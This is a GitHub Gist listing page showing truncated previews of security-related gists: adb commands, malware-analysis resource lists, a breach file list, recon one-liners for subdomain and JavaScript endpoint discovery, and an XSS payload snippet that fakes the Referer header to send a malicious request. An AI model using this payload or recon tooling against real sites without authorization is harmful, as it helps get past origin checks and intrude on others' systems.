Skip to content

Instantly share code, notes, and snippets.

View bl4ckbo7's full-sized avatar

0xA bl4ckbo7

View GitHub Profile
@ffkev
ffkev / niv_encryption_decryption.dart
Created May 20, 2024 03:30
AES gmc Encryption / Decryption logic in Flutter
import 'dart:convert';
import 'dart:typed_data';
import 'package:encrypt/encrypt.dart' as encrypt;
import 'package:flutter/material.dart';
import 'package:flutter/services.dart';
void main() {
runApp(EncryptionApp());
}
@troyhunt
troyhunt / files.txt
Created September 4, 2022 23:30
Alleged TikTok Data Breach
Length Name
------ ----
184 app_info_202209032248.csv
145 app_server_info_202209032248.csv
410 cookie_202209032248.csv
537 oauth_client_details_202209032247.csv
501 oauth_client_extend_202209032247.csv
55 open_sms_phone_202209032247.csv
76 open_sms_temp_202209032247.csv
106 record_add_order_202209032247.csv
@isaqueprofeta
isaqueprofeta / siem_training.md
Last active March 31, 2025 06:44
SIEM Training
@bl4ckbo7
bl4ckbo7 / AdbCommands
Created October 28, 2020 14:38 — forked from Pulimet/AdbCommands
Adb useful commands list
adb help // List all comands
== Adb Server
adb kill-server
adb start-server
== Adb Reboot
adb reboot
adb reboot recovery
adb reboot-bootloader
@bl4ckbo7
bl4ckbo7 / resources.md
Created October 23, 2020 13:26 — forked from muff-in/resources.md
A curated list of Assembly Language / Reversing / Malware Analysis -resources

Assembly Language / Reversing / Malware Analysis -resources

Twitter: Muffin

⭐Assembly Language

@hoodoer
hoodoer / setRefererHeader.js
Last active May 8, 2024 10:01
Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;
// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');
// Send malicious request with faked referer header value
#!/usr/bin/env python3
#Title: Scraper 1.0 (Just wanted to share, you might want to use it when downloading various courses from this repository. Enjoy. ;))
#Author: bl4ckbo7
#Date/Time: Aug 13, 2020 | 23:43 HRS
import requests
from bs4 import BeautifulSoup
import re
def parser(url, tag, selector):
@muff-in
muff-in / resources.md
Last active April 16, 2025 15:12
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@gwen001
gwen001 / ejs.sh
Last active July 7, 2024 07:33
onliner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# using linkfinder
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}
# with file download (the new best one):
# but there is a bug if you don't provide a root url
@payloadartist
payloadartist / firefox.sh
Last active February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done